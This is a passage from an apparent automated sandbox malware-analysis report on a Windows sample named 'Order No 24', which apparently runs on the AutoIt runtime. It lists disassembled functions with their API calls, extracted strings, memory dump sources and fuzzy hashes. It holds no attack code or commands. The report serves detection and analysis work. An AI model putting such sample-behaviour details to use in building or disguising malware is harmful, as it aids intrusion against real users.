                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3974789173-0
                                                                                                                                  • Opcode ID: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                                                                                                                  • Instruction ID: a125e9d0d34c32da15f956ccb57fe7558b238093a233768674635b13d431ba57
                                                                                                                                  • Opcode Fuzzy Hash: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                                                                                                                  • Instruction Fuzzy Hash: 0DE086736012159BD720AFF15D0CB973BACEF557A1F018818F346DA080DB748403C761
                                                                                                                                  Function 0099B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 0099B496
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0099B4A0
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0099B4B5
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0099B4BD
                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 009FDE2B
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 009FDE38
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 009FDE51
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 009FDE6A
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 009FDE8A
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009FDE95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                  • Opcode ID: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                                                                                                                  • Instruction ID: a5beab6d52c2f7814ba63ba8e3090bd7f4542ae0ba328f32f8013e41a893c929
                                                                                                                                  • Opcode Fuzzy Hash: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                                                                                                                  • Instruction Fuzzy Hash: B0E0ED32100248AAEF219BE8AC0DBE83F15AB55339F14C766FB6A580E1C7714592DB11
                                                                                                                                  Function 009FB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                                                                                                                  • Instruction ID: 0915a9110fad445a70ac9a25312ce5ffd8c4a5b75112acdfbd9809726df00e8e
                                                                                                                                  • Opcode Fuzzy Hash: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                                                                                                                  • Instruction Fuzzy Hash: 3DE04FB2100208EFDB009FF0C84866E7BA4EB4C351F11C809FD5A87210DB7998438B40
                                                                                                                                  Function 009BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BB2DF
                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 009BB2EB
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009BB2F4
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009BB2FC
                                                                                                                                    • Part of subcall function 009BAB24: GetProcessHeap.KERNEL32(00000000,?,009BA848), ref: 009BAB2B
                                                                                                                                    • Part of subcall function 009BAB24: HeapFree.KERNEL32(00000000), ref: 009BAB32
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                  • Opcode ID: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                                                                                                                  • Instruction ID: 4bee7750e9294dc8818bba5659998a05c8aa5d9ee9b224b1d86e4d4421de7552
                                                                                                                                  • Opcode Fuzzy Hash: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                                                                                                                  • Instruction Fuzzy Hash: C5E0BF37104009BBCB016BD5EC08859FF66FF883213109221F62581571CB329473EB52
                                                                                                                                  Function 009FB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                                                                                                                  • Instruction ID: f3d48b6fc02f2c0dec7c88d101fa13bd71434b65aaedaf02c62e7a5c6a801127
                                                                                                                                  • Opcode Fuzzy Hash: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                                                                                                                  • Instruction Fuzzy Hash: 89E046B2500208EFDF009FF0C84862DBBA8EB4C351F118809F95E8B210DB7A98438B00
                                                                                                                                  Function 009BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 009BDEAA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContainedObject
                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                                  • Opcode ID: 4bd5f115e2e9ee9796ca70b5f991f620de9a3fc518a09d55fabf3a0b0a4df74a
                                                                                                                                  • Instruction ID: 471ae615761f8dfff54ba510d19b29f99eb187dfb83bc6dc6d7a6abd35d8f5d7
                                                                                                                                  • Opcode Fuzzy Hash: 4bd5f115e2e9ee9796ca70b5f991f620de9a3fc518a09d55fabf3a0b0a4df74a
                                                                                                                                  • Instruction Fuzzy Hash: EF914A70601701AFDB14CF64C984BAAB7F9BF88720F10896DF94ACB691EB70E841CB50
                                                                                                                                  Function 009CDE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • __wcsnicmp.LIBCMT ref: 009CDEFD
                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009CDFC6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                  • String ID: LPT
                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                  • Opcode ID: 9db72cd7abf5f14f65a7accbc2d3f8c43310e807d6b765d2ff2bd7c053c0da31
                                                                                                                                  • Instruction ID: 1d3cf33a1795dd31e4811a8f5a73b7460fedf622c1189f2717f9dd794705d666
                                                                                                                                  • Opcode Fuzzy Hash: 9db72cd7abf5f14f65a7accbc2d3f8c43310e807d6b765d2ff2bd7c053c0da31
                                                                                                                                  • Instruction Fuzzy Hash: E6616D75E04215AFCB14EF98C891FAEB7B8BF48310F05406EF546AB291D774AE40CB92
                                                                                                                                  Function 0099BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0099BCDA
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0099BCF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                  • Opcode ID: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                                                                                                                  • Instruction ID: cdf67357d8fa45c69f8248268824e24c0dc8fecfbe837ead62c5c0ca5a991cf2
                                                                                                                                  • Opcode Fuzzy Hash: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                                                                                                                  • Instruction Fuzzy Hash: 67512571409748ABE720AF58DC86BAFBBE8FFD4354F41484EF1C8410A6EB7085A9C756
                                                                                                                                  Function 009CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009844ED: __fread_nolock.LIBCMT ref: 0098450B
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CC65D
                                                                                                                                  • _wcscmp.LIBCMT ref: 009CC670
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                  • String ID: FILE
                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                  • Opcode ID: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                                                                                                                  • Instruction ID: ef38fea2c0c6813c57bbfa87c0b22a6a59ebba2e49a03420445f86801f2ab5c0
                                                                                                                                  • Opcode Fuzzy Hash: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                                                                                                                  • Instruction Fuzzy Hash: D5419672A0021ABBDF10AAA4DC42FEF7BB9AF89714F004479F605E7191D6759A048B51
                                                                                                                                  Function 009EA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 009EA85A
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009EA86F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: '
                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                  • Opcode ID: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                                                                                                                  • Instruction ID: bc98c4883f003762d28e6be83bc15eba62c8c7c2933411bbaae0d85737d71b38
                                                                                                                                  • Opcode Fuzzy Hash: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                                                                                                                  • Instruction Fuzzy Hash: 0B410A75E013499FDB15CFA9C880BDABBB9FB49300F11006AE905AB351D775AD42CFA1
                                                                                                                                  Function 009D5180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009D5190
                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009D51C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                  • Opcode ID: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                                                                                                                  • Instruction ID: 56c262b60fc5641bb00b26b0961ccc8b275a6e9c97c4dbd96569538433fdc9b7
                                                                                                                                  • Opcode Fuzzy Hash: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                                                                                                                  • Instruction Fuzzy Hash: 82313C71C00119ABCF01EFE4CC85AEE7FB9FF54750F10401AF915A6266DB31AA06DBA0
                                                                                                                                  Function 009E975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 009E980E
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009E984A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                  • Opcode ID: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                                                                                                                  • Instruction ID: 48799173540fbe933459269add76b207c04179eeb262195f0bcfa74cde7d934d
                                                                                                                                  • Opcode Fuzzy Hash: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                                                                                                                  • Instruction Fuzzy Hash: 17317C71110644AAEB119F79CC80BBB73ADFF99764F008619F9A9C71A0DA31AC82C760
                                                                                                                                  Function 009C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C51C6
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009C5201
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: d66dede9cf7abbbbbaaf221f90066445a5fa58e190bf62a564e96f6bc721594f
                                                                                                                                  • Instruction ID: 1fa709b9c4029c1341cc3ebac93cc366de5972a730c1d395d309eb88bdd44625
                                                                                                                                  • Opcode Fuzzy Hash: d66dede9cf7abbbbbaaf221f90066445a5fa58e190bf62a564e96f6bc721594f
                                                                                                                                  • Instruction Fuzzy Hash: F431D571E007049BEB24CF99D845FAEBBFCAF85350F15401DE9A1A61A0D770A984DB12
                                                                                                                                  Function 009D658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __snwprintf
                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                  • API String ID: 2391506597-2584243854
                                                                                                                                  • Opcode ID: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                                                                                                                  • Instruction ID: 59058fe38fafe55d6469d001a849faad6f4bd13236cd63fc520fb937d4899006
                                                                                                                                  • Opcode Fuzzy Hash: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                                                                                                                  • Instruction Fuzzy Hash: 0E217171644219AFCF10EFA4C882FEE77B4BF95744F40485AF505AB281DB70EA45CBA1
                                                                                                                                  Function 009E93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009E945C
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E9467
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: Combobox
                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                  • Opcode ID: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                                                                                                                  • Instruction ID: 0109a1078c69616cef20d6eaa2950dd8ca08287b3c2dce3b115fd424633dc32d
                                                                                                                                  • Opcode Fuzzy Hash: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                                                                                                                  • Instruction Fuzzy Hash: BB116071210258AFEF26DE55DC80EBB376FEB893A4F104125F919972E0E6719C528760
                                                                                                                                  Function 009E98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                                                                                                                    • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                                                                                                                    • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
